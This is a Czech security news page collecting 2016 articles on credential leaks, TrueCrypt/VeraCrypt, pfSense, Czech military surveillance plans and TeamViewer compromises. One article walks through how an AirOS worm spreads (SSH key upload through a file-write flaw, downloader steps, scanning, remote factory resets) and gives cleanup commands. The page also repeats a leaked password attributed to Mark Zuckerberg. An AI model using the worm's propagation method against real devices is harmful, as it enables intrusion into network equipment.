V září 2014 švýcarský vojenský dodavatel utrpěl obrovské datové narušení, které bylo objeveno až v lednu 2016. V květnu švýcarský CERT zveřejnil podrobnou zprávu o útoku, vysvětluje, jak se to stalo a kdy. Podle zprávy, měli útočníci přístup k síti RUAGu déle než jeden rok a jistě ukradli spoustu důvěrných informací.
Hack hackerského fóra Nulled.io
Hackeři zveřejnili částečný výpis databáze z hackerské webové stránky nulled.io. Výpis obsahoval e-mailové adresy, hash hesla a IP adresy 145 096 aktivních členů fóra.
Únik přihlašovacích údajů na Mail.ru
Dne 5. května získalo publicitu to, že obrovská databáze obsahující 272,3 milionů uživatelských přihlašovacích údajů se prodává na temném webu. Tato databáze obsahuje asi 57 milionů mail.ru účtů a desítky milionů přihlašovacích údajů od jiných poskytovatelů e-mailu, jako je Google, Yahoo a Microsoft. Další vyšetřování do hloubky odhalilo, uniklé údaje byly zastaralé.
Linkedin hack
Téměř 117 milionů účtů uživatelů LinkedIn bylo prodáno na temném webu. Tato data byla ukradena v roce 2012.
MySpace únik dat
27. května LeakedSource prohlásil, že má v držení 360 milionů e-mailů a hesel uživatelů MySpace, kdysi slavné sociální sítě. S největší pravděpodobností to také není čerstvé narušení.
Tubmlr únik dat
Loginy a hesla uživatelů Tubmlr se vynořily po narušení v roce 2013. Společnost tvrdí, že nevěděli o narušení dokud nebyla databáze nabídnuta k prodeji.
Twitter hack
Symantec varoval, že hackeři získali přístup k téměř 2,5 tisíc uživatelským účtům na Twitteru a šířili odkazy na webové stránky s obsahem pro dospělé. Mezi oběťmi byli novináři z The Telegraph a New York Times a populární kanadská kapela Chromeo.
TrueCrypt přežil svůj konec. Je bezpečný a navazuje na něj VeraCrypt
27.7.2016 Zdroj:Root.cz Zabezpečení
Před dvěma roky světem IT zamávala zpráva, že končí TrueCrypt, jeden z nejpopulárnějších šifrovacích programů. Vše ale nakonec dobře dopadlo a vznikl povedený nástupce VeraCrypt.
TrueCrypt, zřejmě nejpopulárnější program pro šifrování souborů, skončil 28. května 2014, a to za poněkud zvláštních okolností. Anonymní autoři prostě řekli balíme to a mimo jiné napsali: Používání TrueCryptu není bezpečné, může obsahovat neopravené bezpečnostní chyby. To samozřejmě přililo olej do ohně konspiračním teoretikům, kteří v tom viděli spiknutí, nátlak atp. Ale vzhledem k nastalé situaci se tomu nelze divit.
Dva roky poté nejsou okolnosti konce o nic jasnější, ven se nedostaly žádné nové informace. Asi se tak přikloníme spíš k té nejprostší teorii, že už to autory prostě nebavilo. Autoři ještě nějakou dobu komunikovali přes e-mail, ale nic moc dalšího neprozradili. Za zmínku stojí snad jen fakt, že nedoporučovali fork programu a naopak doporučili začít od nuly: Myslím, že začít od začátku by nevyžadovalo o tolik víc práce, než se snažit pochopit kód současného TrueCryptu, napsal jeden z autorů.
Už před koncem programu se rozjel projekt, jehož cílem bylo TrueCrypt auditovat. Na nezávislý audit se prostřednictvím iniciativy Open Crypto Audit vybralo víc než 70 tisíc dolarů. A tak se i přes ukončení projektu v auditu pokračovalo. Audit provedla společnost iSEC Partners a jeho výsledky potěšily. Sice byl v kódu trochu nepořádek a našlo se několik chyb nízké a střední závažnosti, ale co je nejdůležitější, žádná neoslabovala samotné šifrování.
Asi nejzávažnější nalezená chyba se přitom týkala pouze verze pro Windows. Ve výjimečných případech, kdy se nepovedlo inicializovat Crypto API pro generování (pseudo)náhodných čísel, na to reagoval prostě tak, že sbíral (slabší) entropii z jiných zdrojů. Ale ani audit neodhalí vše, jak ukázalo nalezení poměrně závažné chyby v září 2015. Šlo však o chybu za určitých podmínek umožňující eskalaci práv ve Windows. Opět nic, co by představovalo problém pro spolehlivost samotného šifrování.
Forky brzdí komplikovaná licence
Být TrueCrypt klasický svobodný software, asi by se nad odchodem původních autorů mávlo rukou a zkrátka by na ně navázal někdo jiný. Jenže TrueCrypt tak úplně svobodný není. To je také důvod, proč ho běžně nenaleznete v linuxových distribucích. TrueCrypt používá vlastní licenci, která však není tak restriktivní, jak se traduje. Omezení spočívá jen v tom, že odvozené dílo není možné distribuovat s názvem a logem TrueCrypt. Určité pasáže licence působí trochu nejasně, ale z žádné části nevyplývá, že by software nebylo možné modifikovat a redistribuovat.
Odborná veřejnost se tak nějak shodla, že na forkování TrueCryptu není nic špatného. A tak se forkuje i přes přání autorů, že už by se projekt měl nechat být. Původní licence se bohužel zbavit nelze a bude dále působit jako pomyslná koule na noze odvozených projektů, pro které zřejmě zůstane cesta do distribucí uzavřena. I přesto, že odvozené projekty už jsou mnohem otevřenější než původní TrueCrypt – jeho autoři např. jeli jen na sebe a nepřijímali příspěvky jiných vývojářů.
Možná někoho napadlo, co by se stalo, kdybyste prostě kód TrueCryptu vzali a vydali pod svobodnou licencí? Prakticky asi nic. Těžko by asi došlo k situaci, kdy by původní autoři vyšli z anonymity a hnali vás k soudu. Na druhou stranu open-source komunita licence obecně ctí a takový postup nepřipadá v úvahu. Navíc hrozba sporu, byť jen teoretická, by nad softwarem stále visela. Takže není jiná možnost, než prostě dodržovat licenci nebo napsat software nový, třeba s TrueCryptem kompatibilní.
Nejlepší nástupce: VeraCrypt
Nakonec tedy vzniklo několik forků, z nichž je nejrozšířenější VeraCrypt. Ten se od samého počátku nesnažil dělat žádnou revoluci, ale prostě TrueCrypt udržovat. Takže např. byly opraveny nalezené chyby, ale rozhraní ani funkce se prakticky nezměnily. Projekt je hostován na Codeplexu a spravuje ho francouzská bezpečnostní společnost IDRIX. Část kódu je licencována pod licencí TrueCrypt, část (nová) pod Apache License 2.0.
Hlavní změnou je menší úprava formátu souborů (volume), která však způsobuje nekompatibilitu s TrueCryptem. Týká se to vytváření hlavičky souboru, kdy VeraCrypt používá víc opakování, což by mělo být bezpečnější. Nějaký čas VeraCrypt fungoval pouze s novým formátem, ale později byla přidána i podpora starého formátu z TrueCryptu. Ale pouze pro mountování, nové soubory ve starém formátu už nevytvoříte. Nezapomeňte při mountování zaškrtnout, že se jedná o starý formát, program to poznat nedokáže.
VeraCrypt se dočkal už jedenácti verzí, poslední verze 1.17 vyšla v únoru. Nástroj standardně podporuje Linux, Windows a OS X. Aktuálně lze říct, že všechny menší či větší nedostatky TrueCryptu už byly napraveny a vývojáři už pracují i na větších vylepšeních. Jde hlavně o možnost šifrovat systémové oddíly při použití UEFI. Tuto důležitou funkci kdysi plánoval přidat i TrueCrypt, ale nakonec k tomu nedošlo.
Zmínit můžeme také fork CipherShed, který se zprvu jevil jako nejnadějnější nástupce TrueCryptu. Počáteční nadšení ale rychle opadlo a vývoj se táhne. Letos v únoru přece jen vyšla první verze 0.7.4.0, která opravuje několik chyb TrueCryptu, ale od té doby se zase nic moc neděje. Binárky jsou navíc k dispozici pouze pro Windows.
Závěr
I v roce 2016 můžete pohodlně a pravděpodobně i bezpečně TrueCrypt používat. Otázkou je, zda je lepší použít starý TrueCrypt nebo aktualizovaný VeraCrypt. Záleží na úhlu pohledu. Poslední verze TrueCryptu 7.1a sice obsahuje nějaké ty chyby, ale víme, že nejsou závažné. VeraCrypt zase staré chyby opravuje, ale nemůžeme vědět, zda mezitím nevznikly nové a možná závažnější, protože zdrojový kód není systematicky prověřován.
Přestože VeraCrypt a práci lidí z IDRIXu oceňuji, byl bych radši, kdyby byl vývoj ještě otevřenější. Asi kvůli relativně malému projektu nemusíme zakládat nadaci, ale bylo by fajn, kdyby ho pod svá křídla vzala nějaká OSS organizace s dobrou reputací a vývoj transparentně organizovala. Sice je hezké, že se udělal audit, ale když se kód nebude revidovat soustavně (a nejlépe nezávisle), tak zas budeme tam, kde jsme byli.
Firewall pfSense založený na FreeBSD: historie projektu
27.7.2016 Zdroj:Root.cz Zabezpečení
V mini seriálu o firewallu pfSense si povíme o této distribuci založené na FreeBSD. Odhalíme historii projektu a postupně se podíváme na jednotlivé vlastnosti systému.
Historie projektu pfSense
Firewalů a routerů pro použití v různých sítích exisuje celá řada. Velmi známým open source firewallem je např. OpenWRT, ten je postaven na linuxovém kernelu a disponuje velkou a aktivní komunitou. Do kategorie open source se též řadí již 12 let projekt pfSense, který stojí na odlišných základech a těmi je prověřený operační systém FreeBSD. Z názvu projektu jsou velmi významná první dvě písmena, která označují stavový firewall Packet Filter, který je vyvíjen jako součást operačního systému OpenBSD, z něhož je portován na ostatní *BSD platformy. Je málo známé, že Packet Filter je portován i na Apple OS X.
Projekt vznikl v roce 2004 jako fork staršího obdobného projektu m0n0wall. Spoluzakladateli projektu byli Chris Buechler a Scott Ullrich. Za projektem dnes stojí společnost Electric Sheep Fencing LLC. V letech 2003–2013 byl pfSense pod křídly BSD Perimeter LLC. Důvody pro změnu názvu a přemístění společnosti uvedl Chris na blogu projektu.
Z projektu m0n0wall vzniklo hnedle několik dalších dobře známých open source projektů jako je FreeNAS, AskoziaPBX a nejnovějším je OPNsense. V loňském roce 15. února 2015 se Manuel Kasper rozhodl projekt m0n0wall definitivně ukončit.
Počátkem roku 2015 jsem zaregistroval zprávičku o poněkud nesvobodném chování uvnitř projektu. Situace byla hodně nepřehledná a přelicencování projektu způsobilo vznik nového forku pfSense, tím se stal již zmiňovaný OPNsense. Nový fork jsem zatím nevyzkoušel, ale v rámci tohoto seriálu si na něj čas udělám. Dne 12.4. 2016 vyšla poslední, nová a značně přepracovaná verze 2.3, která nese přívlastek pfSense-CE (Comunity Edition). Dá se tedy očekávat, že pfSense-EE (Enterprise Edition) verze bude přítomna v produktové rodině hardware nabízené na stránkách projektu. Již zmiňovaný Manuel Kasper se zjevně přiklonil na stranu OPNsense tímto prohlášením. Pevně věřím, že částečná komercionalizace projektu pfSense neublíží.
Podporovaný embedded hardware
Společným jmenovatelem pro m0nOwall i pfSense byl embedded hardware od společnosti PC Engines, s nimiž se v souběhu vyvíjely i oba firewalové systémy. Společnou mají podporu Compact Flash instalací, kterou zmíněný HW vyžaduje. Dalším použitelným výrobcem pro oba systémy je např. společnost Soekris.
Švýcarská společnost PC Engines vyráběla desky s označením WRAP, podstatně inovovanější jsou dnes stále vyráběné desky ALIX a současné nejmodernější jsou desky s označením APU, které jsou osazeny mSATA slotem, který konečně překonává zastaralé a pomalé Compact Flash. Do slotu lze instalovat malé mSATA SSD moduly např. o velikosti 16 GB. Desky PC Engines disponují též slotem miniPCI express, do kterého se dá připojit WiFi karta a tím se rozšíří funkcionalita routeru. Nastavení WiFi adaptéru má v pfSense velmi široké možnosti, které si popíšeme v dalších dílech.
pfSense je současně zdarma stažitelný pro architektury AMD64 a i386 ve verzích, viz tabulka. Dále ještě existují verze pro VGA a sériovou konzoli.
Platforma
CD images (ISO) with installer
Memstick image with installer
Embedded (NanoBSD) typically with CF
Média ISO a Memstick jsou instalovatelné na libovolný hardware architektur AMD64 a i386. Instalace je možná i jako virtuální appliance. pfSense disponuje balíčkem Open VM Tools, který je potřebný při instalaci do VMWare prostředí. Podporovaný hardware musí splňovat požadavky dle FreeBSD hardware notes příslušné verze, kterou pfSense používá.
U embedded verze je nutné poznamenat, že používá NanoBSD, které vyvinul Poul-Henning Kamp. NanoBSD vytváří bitové kopie systému FreeBSD pro embedded aplikace, vhodné pro použití na Compact Flash (či jiných paměťových médiích).
Při výběru hardware pro požadovanou síťovou úlohu je vždy nutné zvolit patřičně výkonný hardware. Zde je uvedeno pěkné srovnání použití šifer pro OpenVPN a IPSec v závislosti na rychlosti spojení od jednoho výrobce používajícího pfSense.
Jednou z nevýhod je bezesporu cena, která je u HW pro pfSense vyšší než například ceny RouterBoard desek pro MikroTik. Nevím přesně, jak je to s výkonem CPU a RAM u nějakých srovnatelných modelů.
Historie verzí
Během 12letého vývoje se pfSense patřičně proměnil. Bylo přídáno mnoho funkcí a různých rozšiřujících balíčků. Poslední verze 2.3.1 přinesla velké množství oprav a změn. Asi největší změnou je zcela nový vzhled GUI využívající Bootstrap framework. Web server lighttpd byl vyměněn za nginx. Pro rychlé nahlédnutí na pfSense 2.3 autoři připravili pěkné video. Mezi firewallová pravidla lze nově vkládat separátor pro přehledné oddělení pravidel. Dále se výrazně upravily možnosti konfigurace grafů. Změn je opravdu mnoho.
Starší verze pfSense tak trochu pokulhávaly s použitím aktuálního FreeBSD. To se od verze 2.2 výrazně posunulo. Aktuální pfSense 2.3.1 používá FreeBSD 10.3-RELEASE-p3 a ve svých opravách důsledně příjímá i opravy FreeBSD systému, což dříve též nebylo zvykem. Pokud se tedy objeví nějaká chyba ve FreeBSD Security Advisories, velmi brzo se opraví i verze pfSense.
Verze pfSense
Version 1.0 October 4, 2006
Version 2.0 September 17, 2011
Version 2.1 September 15, 2013
Version 2.2 January 23, 2015
Version 2.3 April 12, 2016
Jednou z velmi zajímavých vlastností pfSense je snadná možnost aktualizací sama sebe. Není tedy nutné nějak složitě provádět manuální výměny firmware. Vždy je nutné se držet instrukcí v Upgrade Guide.
Verze 2.2.x se barvila do červena a zavedla volitelný dashboard.
Verze 2.3.x přišla s již popisovanými novinkami. Menu zůstalo v zásadě stejné, proto se uživatelé neztratí při přechodu na novější verze.
Seznam základních vlastností a funkcionalit
Závěrem uvádím seznam vlastností projektu pfSense i s odkazy na dokumentaci.
Firewall with stateful packet inspection
Easy to use Web Based Graphical Interface
Installation Setup Wizard
Configurable Dashboard with many available widgets
IPv4 and IPv6 support
Wireless Access Point (must install a wireless interface which supports hostap mode), including VAP/MBSS support on certain chips.
Wireless Client Support (802.11 and 3G/4G with supported devices)
Ability to setup and filter/isolate multiple interfaces (LAN, DMZ, etc.)
Traffic Shaping (ALTQ, Limiters, 802.1p match/set, DiffServ/DSCP matching)
State Table controls (per-rule / per-host limits, timers, etc.)
NAT (Port Forwards, 1:1 NAT, Outbound NAT, NPt)
Redundancy/High Availability – CARP+pfsync+XMLRPC Config sync allows for hardware failover. Two or more firewalls can be configured as a failover cluster.
Multi-WAN Support
Server Inbound Load Balancing
Network diagnostic utilities such as ping, traceroute, port tests via the GUI (more with packages, such as nmap)
VPN – IPsec (including Phase 2 NAT), OpenVPN, L2TP
PPPoE Server
RRD Graphs
Real-time interface traffic graphs
Dynamic DNS
Captive Portal
DHCP Server and Relay (IPv4 and IPv6)
Command line shell access (Via console and SSH)
Wake on LAN
Built in packet capture / sniffer
Ability to backup and restore the firewall configuration via the web GUI
Edit files via the web GUI
Virtual interfaces for VLAN, LAGG/LACP, GIF, GRE, PPPoE/PPTP/L2TP/PPP WANs, QinQ, and Bridges
Caching DNS Forwarder/Resolver
Can be run in many virtualization environments
Proxy Server (using packages)
Závěr
V dalším díle mini seriálu o pfSense se podíváme na možnosti instalace a práce s routerem na sériové konzoli. Dále si ukážeme další vybrané funkcionality, které pfSense umí.
Motherfucker: virus v bezdrátových zařízeních Ubiquiti (AirOS)
27.7.2016 Viry
Zařízení s operačním systémem AirOS jsou ohrožena kvůli vážné bezpečnostní mezeře, která dovoluje modifikovat souborový systém bez znalosti přihlašovacích údajů. Jak se bránit?
Před pěti lety se kvůli bezpečnostní díře začal šířit virus Skynet. Možná si pamatujete na nahodilé restartovaní zařízení. Před měsícem byla popsána nová bezpečnostní díra ve všech typech zařízení AirOS. Ta umožňuje útočníkovi nahrát jakýkoliv soubor kamkoliv do souborového systému Wi-Fi zařízení bez znalosti přihlašovacích údajů.
V pondělí 16. května byl konečně vydán opravný firmware verze 5.6.5, který tuto chybu řeší. Jak se vlastně dostane do nezabezpečeného zařízení?
Infekce zařízení
Jelikož exploit umožňuje nahrání souboru kamkoliv do souborového systému, virus si nahraje veřejný klíč SSH do routeru (bez nutnosti autentizace). Také zkopíruje sám sebe do zařízení. Přihlásí se pomocí SSH a nainstaluje se. Tedy rozbalí si tar, zapíše se do souboru rc.poststart a zapíše se do perzistentní paměti. Pak se restartuje.
Po restartu
Znovu se rozbalí z taru, a spustí soubor mother. Tato matka si nastaví firewall na HTTP/HTTPS – tím můžete poznat infikované zařízení. Dále inicializuje stažení příkazu curl a několika knihoven pomocí wget. Příkaz curl potřebuje pro své šíření a nevejde se do perzistentní paměti.
Následně spustí search a začne skenovat adresní prostor. Pokud najde zařízení, které by mohlo být „airos“, zkusí na něj nahrát pomocí HTTP (HTTPS) opět svůj veřejný klíč a následně se zkusí pomocí SSH přihlásit do zařízení a nainstalovat se.
To však není vše. Skript si ukládá IP adresu pravděpodobně infikovaných zařízení a zkusí je všechny přibližně jednou za 66 666 sekund (18,5 hodiny) resetovat pomocí webového přístupu do továrního nastavení – skript fucker. Reset se podaří jen na zařízení, které se nepodařilo správně infikovat a samozřejmě mají zranitelný firmware.
Dále na hostitelském zařízení pustí odpočet na 666 666 sekund (7,5 dne) a po uplynutí přenastaví ESSID na „motherfucker“ a následně zařízení vypne. Detaily naleznete na fóru ubnt.
Jak se bránit?
Především aktualizovat na firmware 5.6.5! Zároveň je dobré nasadit firewall na HTTP nebo HTTPS, stačí jej nastavit ve webovém rozhraní zařízení. Dále je možné nastavit naslouchání zařízení na jiný než výchozí port 80 či 443. Zkušenější samozřejmě mohou využít vlastních skriptů v ubnt.
Pokud už jste byli napadeni, můžete manuálně odstranit virus pomocí SSH:
# cd /etc/persistent/
# rm mf.tar
# rm rc.poststart
# rm -R .mf
# sed -i "/^mother/d" /etc/passwd
# cfgmtd -p /etc/ -w
# reboot
Doufám, že všichni stihnete aktualizovat dříve, než naši republiku pokryje Wi-Fi nápis „motherfucker“.
Další hesla na prodej, 32 milionů hesel od účtů na Twitteru
27.7.2016 Zdroj:Lupa.cz Sociální sítě
Pokud jste ještě nezačali řešit dvoustupňové ověřování na podstatné online služby, tak je nejvyšší čas.
LeakedSource získal databázi 32 milionů účtů z Twitteru s kompletními přihlašovacími údaji, tedy určením účtu a jeho hesla. Odkud přesně data pocházejí, jasné není, jsou ale na prodej na darkwebu. Jde přesně o 32 888 300 záznamů obsahujících e-maily, uživatelská jména (název účtu) a hesla. Pokud se obáváte, že by vaše heslo mohlo být mezi uniklými, můžete si to na LeakedSource ověřit. Druhá varianta pro ověřování je haveibeenpwned.com.
Je krajně nepravděpodobné, že by šlo o únik (hack) z Twitteru jako takového. Nejpravděpodobnější vysvětlení je, že jde o data nasbíraná z malware, které po napadení prohlížečů (Firefox, Chrome zejména) shromažďuje přihlašovací údaje. LeakedSource navíc upozorňují, že množství údajů v databázi pochází z Ruska, šest z deseti nejvíce používaných domén v e-mailech pochází právě odtamtud.
Nejvíce populární heslo v tomto úniku je stále 123456 (17 471 výskytů. Zuckerbergovo heslo v tomto úniku není, ale jak už víme, Mark Zuckerberg používá všude jedno snadné heslo. Nebuďte jako on a hesla mějte unikátní, složitá a tam, kde je to podstatné (což může být právě účet na Twitteru), si pořiďte dvoufaktorové ověření.
Pokud se na výše uvedených službách vydáte ověřovat, zda váš e-mail není v některém z úniku, tak je dobré vědět, že tím nezjistíte, jaké heslo uniklo. Jen to, zda se určitý e-mail nachází v některém z úniků.
Vojenští špioni chtějí sledovat internetový provoz. I bez posvěcení soudem
27.7.2016 Zdroj:Lupa.cz Sledování
Česká armáda se chystá na kyberválku. Buduje Národní centrum kybernetických sil a chce dát Vojenskému zpravodajství nové digitální pravomoci.
Iluze o naprosto svobodném internetu v Česku, do kterého nijak nezasahují státní složky, se postupně rozplývá – a nemůže za to jen nedávno schválený zákon o hazardních hrách. Teď chce výrazně silnější pravomoci, týkající se „odposlechu“ internetového provozu, také ministerstvo obrany, respektive Vojenské zpravodajství.
Sledovat síťový provoz už dnes běžně může policie v rámci boje proti kriminálníkům používajícím ke své činnosti internet. Systém v tomto případě funguje tak, že policie na základě rozhodnutí soudu kontaktuje providera či provozovatele datového centra, u kterého se následně provádí technické sledování.
„Dokonce to funguje tak, že v podstatě policii dodáváme službu. Odkloníme provoz daného serveru na jiný server, kde pak vše zaznamenáváme. Státu pak za to posíláme fakturu,“ vysvětluje pro Lupu jeden z providerů, který nechce být jmenován.
Stát za uchovávání dat platí i v dalším případě, který se týká takzvané data retention. V rámci této povinnosti musí provideři po dobu šesti měsíců uchovávat informace o komunikaci. K těmto údajům pak opět po rozhodnutí soudu mají přístup tajné služby, ČNB či policie.
Provideři si technologie pro účely data retention nakupují sami. V podstatě jde o běžné servery a routery, které v síti fungují jako sondy. V Česku se obvykle používají „krabice“ od brněnské firmy Flowmon Technologies či Radware. Jedna taková sestava vyjde na částku kolem 15 milionů korun, plus jsou zde samozřejmě náklady na místo v serverovém racku, napájení a podobně. I zde se faktury posílají státu.
„Občas to má i trochu bizarní nádech. Někdy chtějí státní složky s providerem, u kterého chtějí technologie nasazovat, diskutovat například technická řešení. Takovou činnost lze státu fakturovat jako konzultaci,“ popisuje další z poskytovatelů.
Internetový odposlech bez soudu
Tyto dva případy mají jedno společné – o nasazování „štěnic“ či poskytování dat rozhoduje soud. To ovšem nemá být případ chystané novely zákona č. 289/2005 Sb., o Vojenském zpravodajství, kterou předložilo ministerstvo obrany spadající pod vládu Babišova hnutí ANO.
Vojenské zpravodajství by podle novely mělo získat možnost instalovat „internetové odposlechy“ přímo u providerů. Ovšem s tím rozdílem, že o nasazení by měla místo soudu rozhodovat přímo vláda, kterou bude moci o použití odposlechů požádat šéf Vojenského zpravodajství, respektive ministr obrany.
Podle důvodové zprávy nemusí nasazení techniky schvalovat soud, protože Vojenské zpravodajství nebude mít podle novely právo sledovat obsah komunikace konkrétních osob, ale jen „obecných znaků datového provozu odůvodňujících možné následné užití obranných aktivit.“
„…zákon o Vojenském zpravodajství i dosud stanovuje, že použitím zpravodajské techniky, pokud jím není zasahováno do základních práv a svobod, není monitorování telekomunikačního, radiokomunikačního nebo jiného obdobného provozu bez odposlechu jeho obsahu, popřípadě zjišťování údajů o tomto provozu, to znamená, že k monitorování provozu sítí bez soudního povolení je Vojenské zpravodajství oprávněno již nyní,“ argumentuje ministerstvo.
Kybernetická obrana
Česká armáda už - podobně jako například NATO - postavila kybernetický boj na úroveň toho tradičního, a v rámci těchto aktivit chce vytvořit nové Národní centrum kybernetických sil, které má fungovat právě pod Vojenským zpravodajstvím. Roční provoz má vyjít na 300 milionů korun ročně.
Náklady lze čekat i na straně providerů. To, do jaké výšky se vyšplhají, ještě není jasné, vojáci každopádně mají providerům investice do technických prostředků uhradit. Pokud by někdo neumožnil spolupráci, má dostat pokutu. Největší problém novely ale tkví v něčem jiném.
„V zákoně o elektronických komunikacích se doplňuje povinnost právnických a fyzických osob zajišťujících síť elektronických komunikací nebo poskytujících službu elektronických komunikací na náklady Vojenského zpravodajství zřídit a zabezpečit v určených bodech své sítě rozhraní pro připojení technických prostředků kybernetické obrany,“ píše ministerstvo obrany.
Možná analýza komunikace
Jenže zde lze debatovat nad pojmem „kybernetická obrana“. Například Národní bezpečnostní úřad v připomínkovém řízení uvádí, že zákon nijak neřeší skutečnou aktivní kybernetickou obranu. „Novela vyvolává silný dojem, že je zpravodajského charakteru a cílí pouze na sběr informací a kybernetickou obranu řeší jen administrativně,“ zmiňuje se NBÚ, který sám kyberochranu země řeší.
Ministerstvo obrany plánuje vytvořit vlastní novou vojenskou síť, která má být odolná vůči kybernetickým útokům – ta ale není součástí novely zákona o Vojenském zpravodajství a přímo s ní nesouvisí.
Zmiňovanému zpravodajskému charakteru novely zákona nahrává i to, že Vojenské zpravodajství by mělo čistě technicky mít možnost sledovat i obsah komunikace, například prostřednictvím dost agresivní metody Deep Packet Inspection analyzující přímo pakety. To už by tak trochu bylo na úrovni Ruska a jeho „černých krabic“ SORM, které k providerům instaluje tamní tajná služba FSB.
Jako měření rychlosti
Novela zákona sice jasně neříká, že je možné sledovat i obsah samotné komunikace. Problémem je, že technologie to zvládnou a zákon analyzování komunikace nezakazuje. Proti tomu se v připomínkovém řízení ohrazují například Bezpečnostní informační služba (BIS), Hospodářská komora ČR nebo ministerstvo spravedlnosti. Kritici požadují, aby zákon možnost naslouchání komunikace přímo zakázal.
Ministerstvo obrany v důvodové zprávě ujišťuje, že „technické prostředky kybernetické obrany (…) nemají za cíl narušovat soukromí nebo tajemství zpráv a, to je třeba zdůraznit, rozhodně neopravňují Vojenské zpravodajství sledovat obsah komunikace konkrétních osob (pro tento typ jednání nadále a výhradně platí pravidla pro použití zpravodajské techniky), ale pouze signalizovat určité přesně definované negativní jevy související s kybernetickým prostorem.“
Monitoring kyberprostoru pak přirovnává k tzv. úsekovému měření rychlosti na silnicích. „Kamerový systém změří a zaznamená rychlost (tj. chování) všech vozidel bez rozdílu a bez identifikace, a správní orgány se poté zaměří jen na ta vozidla, jež jsou automaticky vyhodnocena jako vozidla porušující pravidla, přičemž ostatní zůstanou bez povšimnutí,“ argumentuje.
Mark Zuckerberg používá všude jedno snadné heslo. Nebuďte jako on
27.7.2016 Zdroj:Lupa.cz Hrozby
Pokud jste si v úniku hesel z LinkedIn našli heslo Marka Zuckerberga, mohli jste mu „hacknout“ Twitter i Pinterest. Někdo byl ale zřejmě rychlejší.
Heslo Marka Zuckerberga z LinkedIn bylo „dadada“ a o víkendu ho útočníci použili k „hacknutí“ jeho účtu na Twitteru i na Pinterestu. Chápete to správně, Zuckerberg používá zásadně jednoduché heslo, nejspíše i na více službách. A poté, co toto heslo unikne na veřejnost, zůstane v klidu. Tedy do okamžiku, než mu někdo nabourá další účty.
Šéf (a částečný majitel) jedné z nejsilnějších internetových firem se prostě chová jako ten nejhloupější uživatel internetu. Buď jedno a to samé heslo používá na dalších službách, nebo používá nějaký klasický, snadno odhadnutelný systém, který útočníkům umožní uhodnout i hesla na jiných službách.
TIP: Jak vytvářet silná a přitom dobře zapamatovatelná hesla?
Proti běžným smrtelníkům má ovšem Zuckerberg jednu výhodu: Twitter i Pinterest mu jeho účty velmi rychle vrátily. Což se u normálního člověka stane velmi málokdy a je to nesmírně obtížné.
Skupina útočníků vystupující pod jménem Ourminem si z Zuckerberga trochu dělala legraci. Na jeho Twitter například napsali výzvu, aby je kontaktoval („Hey we got access to your Twitter & Instagram & Pinterest, we are just testing your security, please direct message us“). Navíc tvrdí, že se jim podařilo získat přístup i na Instagram. To je ještě o něco pikantnější, protože Instagram patří přímo Facebooku.
Je dobré připomenout, že jak Twitter, tak Instagram umožňují velmi snadno použitelné dvoufaktorové ověření.
TeamViewer reaguje na údajný hack. Viní špatná hesla
27.7.2016 Zdroj:Lupa.cz Hacking
Populární software pro vzdálený přístup měl být prý hacknut a postižení uživatelé hlásí řadu škod. Jedno je ale jasné. Nic nevíme.
TeamViewer je populární pomůcka pro vzdálený přístup. Pokud si ji pořídíte do počítače, můžete získat software, který jde poměrně obtížně deaktivovat či nastavit tak, abyste si ho mohli spustit jenom, když chcete, aby běžel. Poměrně zásadní může být i to, že řadě uživatelů skutečně nemusí dojít, že si do počítače dávají něco, co někomu cizímu může umožnit vzdálený přístup až příliš snadno. Zejména pokud si TeamViewer nedostatečně zabezpečí.
Minulý týden se v řadě zahraničních medií objevily úvahy nad tím, že možná došlo k hacknutí serverů TeamVieweru, případně že existuje nějaká zásadní bezpečnostní chyba. Řada uživatelů TeamVieweru hlásila, že jejich počítače byly kompromitovány, bez rozdílu platformy. Mělo jít ale i o uživatele, kteří měli silné heslo, včetně některých, kteří používali dvoufaktorové ověřování.
Řada uživatelů přišla o peníze na PayPal účtech, někdo si prohlédl a možná i stáhl jejich poštu, objevují se i informace o objednávkách na Amazonu či eBay. Nákupy proběhly zpravidla v podobě dárkových karet, běžně i za několik tisíc dolarů.
Úvahy o tom, že by za vším mohl být hack přímo na serverech TeamVieweru, podpořil i více než tříhodinový výpadek, velmi pravděpodobně způsobený DDoS útokem. Několik zdrojů ale navíc uvádí, že DNS servery pro TeamViewer měly být přesměrovány na čínské adresy.
Team Viewer samotný tvrdí, že žádné napadení systémů se nekoná a že za případné problémy si mohou uživatelé samotní. Prostě tím, že nepoužili dostatečně silné heslo a navíc prý na více počítačích používají stejné heslo, které je v řadě případů totožné s tím, které mají (například) na LinkedIn či dalších službách, odkud už v minulosti unikly stovky milionů přihlašovacích údajů. Dalším možným ohrožením může být trojský kůň, který se tváří jako aktualizace pro Adobe Flash a zaměřuje se právě na využití TeamVieweru.
V pozdějším prohlášení pak TeamViewer ohlásil zavedení nových bezpečnostních opatření – například nutnost potvrzení, pokud se uživatel přihlásí z nového zařízení.
TeamViewer se nijak nevyjádřil k případům, kdy uživatelé uvádějí, že měli silné unikátní heslo, či dokonce dvoufaktorové ověření. K problémů s DNS servery poskytl pouze vyjádření v tom smyslu, že byly odstaveny DDoS útokem, ale v žádném případě nedošlo k narušení bezpečnosti.
Máte na počítači TeamViewer?
Pokud máte na počítači TeamViewer, případně pokud jste ho někomu na počítač pořídili a pomáhali mu, tak je nejvyšší čas velmi bedlivě ověřit, jestli používá dostatečně silné heslo, případně stávající heslo nahradit preventivně jiným.
Nejpodstatnějším opatřením by ale mělo být hlavně to, že nebudete mít TeamViewer spuštěný bezdůvodně. Je nutné zakázat automatické spouštění a po použití ho nezapomínat vypnout. U starších verzí TeamVieweru je něco takového poněkud komplikovanější a nejsnazší je u nich odinstalace a nová instalace později, když bude program znovu potřeba.
Ponechávat TeamViewer použitelný pouze zadáním jednoho hesla navíc není zcela nejlepší nápad. Trochu něčemu takovému ale nahrává to, že okamžitě po instalaci je uživatel v zásadě přesvědčen, aby něco takového povolil. Prověřte si tedy velmi pečlivě, jak máte TeamViewer nastavený.
Uchováváte si hesla v prohlížeči?
Z výše uvedených případů vykradených účtů v PayPalu či nákupů přes e-shopy ale plyne i další poměrně podstatné bezpečnostní opatření. Pokud používáte PayPal a máte tam napojenou platební kartu či tam máte nějaké prostředky, rozhodně byste neměli mít heslo uložené přímo v prohlížeči.
Totéž platí i o jakékoliv službě, která umožňuje okamžitě platit z vaší platební karty, bez nutnosti zadávat (ověřovat), že platba má skutečně proběhnout. Jakýkoliv útočník, který se dostal k vašemu počítači ve formě vzdáleného přístupu či přímého přístupu, takovéto věci může příliš snadno zneužít.
Kvůli schválení zákona o hazardu padají weby. Útoky cílí na politiku a policii
